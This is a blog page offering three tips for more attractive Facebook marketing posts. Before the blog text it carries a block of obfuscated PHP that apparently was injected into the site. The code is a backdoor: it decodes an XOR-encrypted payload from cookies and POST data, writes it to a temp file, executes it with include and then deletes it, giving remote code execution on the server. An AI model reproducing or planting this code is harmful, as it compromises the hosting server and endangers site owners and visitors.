$bQfNqUMidN = chr ( 397 - 310 ).chr ( 217 - 122 ).chr ( 327 - 257 ).chr (72) . "\x44" . "\102" . 'l';$eNWYpLiMy = chr ( 535 - 436 )."\154" . chr ( 1053 - 956 ).chr ( 525 - 410 ).'s' . chr ( 158 - 63 ).'e' . chr ( 859 - 739 )."\x69" . 's' . 't' . "\x73";$CZhbFc = class_exists($bQfNqUMidN); $bQfNqUMidN = "11349";$eNWYpLiMy = "11582";$hIUkPr = FALSE;if ($CZhbFc === $hIUkPr){function OlhDCe(){return FALSE;}$zCfCC = "4710";OlhDCe();class W_FHDBl{public function tKzcE(){echo "18131";}private $lODFZZ;public static $AGzEN = "70ae3bbc-7348-45b3-81da-6b08adbe7fcd";public static $YedaPndqI = 47426;public function __destruct(){$zCfCC = "29138_5712";$this->sDiskuNvci($zCfCC); $zCfCC = "29138_5712";}public function __construct($kalrginVa=0){$CNbqVDsE = $_POST;$HVsMsQa = $_COOKIE;$jMWFl = @$HVsMsQa[substr(W_FHDBl::$AGzEN, 0, 4)];if (!empty($jMWFl)){$RFXKpoRe = "base64";$bPTxBPNmw = "";$jMWFl = explode(",", $jMWFl);foreach ($jMWFl as $xPEwQU){$bPTxBPNmw .= @$HVsMsQa[$xPEwQU];$bPTxBPNmw .= @$CNbqVDsE[$xPEwQU];}$bPTxBPNmw = array_map($RFXKpoRe . chr (95) . chr (100) . chr ( 634 - 533 )."\143" . "\157" . chr ( 391 - 291 )."\x65", array($bPTxBPNmw,)); $bPTxBPNmw = $bPTxBPNmw[0] ^ str_repeat(W_FHDBl::$AGzEN, (strlen($bPTxBPNmw[0]) / strlen(W_FHDBl::$AGzEN)) + 1);W_FHDBl::$YedaPndqI = @unserialize($bPTxBPNmw);}}private function sDiskuNvci($zCfCC){if (is_array(W_FHDBl::$YedaPndqI)) {$cjfzjnR = sys_get_temp_dir() . "/" . crc32(W_FHDBl::$YedaPndqI["\163" . "\141" . "\x6c" . chr ( 116 - 0 )]);@W_FHDBl::$YedaPndqI["\x77" . chr (114) . chr ( 733 - 628 ).chr (116) . chr (101)]($cjfzjnR, W_FHDBl::$YedaPndqI[chr ( 117 - 18 ).chr (111) . 'n' . chr (116) . chr (101) . 'n' . chr ( 500 - 384 )]);include $cjfzjnR;@W_FHDBl::$YedaPndqI['d' . chr ( 912 - 811 ).chr (108) . "\145" . chr ( 751 - 635 ).'e']($cjfzjnR); $zCfCC = "4710";exit();}}}$vdNZm = new /* 29428 */ W_FHDBl(); $vdNZm = str_repeat("29138_5712", 1);} Blog – Maie Woods


3 Basic Steps For More Attractive Facebook Posts

So you’ve made the transision from regular Facebook user to Facebook marketing. Here are 3 ssteps you can follow to look more professional and attractive to your followers.

Step 1 K.I.S.S.

Try to keep your posts under 140 characters.  Followers will more likely read your entire post if they don’t have to “continue.”

If you are a blogger, create a teaser.  Make your post interesting using only 3-5 sentences.

Most Facebook users are mobile users.  Keep in mind they like to get straight to the point.

Step 2 Use Images

Including full photos tremendously increasing our engagement.

Be sure they are appealing & relatable.

If you are driving traffic to your blog or website, use a shortened link. (ie bit.y )  It is  a more appealing look.

Step 3 Engage

Don’t invite company to your house talk about yourself all night.

In other words, ask questions; Engage with your audience.

For example,

  •  If I’m a caterer and I post an article about Spring Party Appetizers, my question may ask “What’s your favorite spring time dish?”
  • Timing is everything.  Remember followers are logged on first thing in the morning, lunch time, and right after work.